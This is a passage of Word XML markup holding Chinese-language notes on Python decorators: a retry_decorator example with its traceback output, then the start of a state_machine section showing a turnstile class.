          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>、自动重新运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA58AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F287C4E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果执行过程中抛出了异常，那么可以尝试让</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> retry() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数再次运行。该软件包也需要我们自行安装，安装命令如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F356A32" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pip install retry_decorator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F37B9EF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77E4E162" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面是一个使用该装饰器的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A76B75" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">from retry_decorator import *                 # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>引入重试模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD22EEA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">@retry(Exception, tries=3, timeout_secs=0.3)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>自动重试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>次，间隔</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>0.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>秒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195E7E75" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">def retry_demo():                             # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果抛出了任意类型的异常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592611DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    import sys,time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24883071" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print('working now')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B71AC5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    raise Exception('Testing retry')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668AC87D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753A43D7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5749868A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        retry_demo()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABB4AA7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2BBF6F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print('Received the last exception')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5BEC34" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行后的输出如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7481496D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$ python retrydemo1.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEABFD4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>working now                             #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行代码的输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECDEAC7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR:root:Retrying in 0.32 seconds ... # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0.32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>秒后再次尝试运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB4A810" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Traceback (most recent call last):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A04A80" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  File "/anaconda3/lib/python3.7/site-packages/retry_decorator/retry_decorator.py",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0556DE6E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>line 26, in f_retry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709FD1D6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    return f(*args, **kwargs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E420191" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  File "retrydemo1.py", line 7, in retry_demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0542F737" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    raise Exception('Testing retry')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75129CCB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exception: Testing retry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66161134" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">working now                              # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>轮运行，第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行代码的输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779EE2A9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ERROR:root:Retrying in 0.60 seconds ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256A6761" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Traceback (most recent call last):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0CC2FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  File "/anaconda3/lib/python3.7/site-packages/retry_decorator/retry_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA13A14" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          decorator.py",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263DE6E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>line 26, in f_retry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD043B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    return f(*args, **kwargs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C2EA32" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  File "retrydemo1.py", line 7, in retry_demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479F5FC6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    raise Exception('Testing retry')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482A0014" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exception: Testing retry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E51CE3E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">working now                               # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>轮运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7361E53B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Received the last exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA3F7EE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="666B23B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>、状态机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37466E3D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23FFE192" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7D557D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://pythonhosted.org/</w:t>
      </w:r>
      <w:bookmarkStart w:id="416" w:name="OLE_LINK15"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>state_machine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="416"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25455FC6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://github.com/jtushman/state_machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7177EDB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20E78DED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>个人理解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，状态机需要先声明一个类是状态机，然后使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>State</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数指定几个状态的变量。然后使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Event()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定从什么状态切换到什么状态。最终实例化的话，先实例化，然后执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.save()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；实例变量名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则切换状态，该方法需要在函数中使用类似成员变量一样的方式写如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> slowdow = green.to(yellow)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种方式的（变量名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法），切换状态前或者后使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>@before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>@after</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>装饰的函数会执行。定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> on_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会自动触发该函数的动作。实例变量使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> cycle() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数会让实例循环状态。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3C8E18" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2424161F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于一个状态机来说，需要定义状态和状态迁移函数，在某个事件发生时，会调用对应的状态迁移函数，如果迁移函数执行失败，其会调用用户定义的失败处理函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17717037" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75EAB65C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面是使用该状态机装饰器的例子，该例子描述了闸机的状态。闸机只有两个状态，一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>是锁死，一个是可以推动的非锁死状态。事件也有两个，一个是让闸机锁死，一个是让闸机解锁。状态转换函数应该有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个，但有两个可以和别的共享，所以实际上只有两个状态转换函数，一个是解锁处理函数，一个是锁定处理函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4862D318" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12491A4F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于任意状态转换的过程中可能发生异常情况，所以需要定义异常，该函数会在转换函数抛出异常时被调用。下面是一个例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19831355" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5489540F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>@acts_as_state_machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336A956C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">class Turnstile(object):                                        # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个类对应一个状态机</w:t>
      </w:r>
    </w:p>
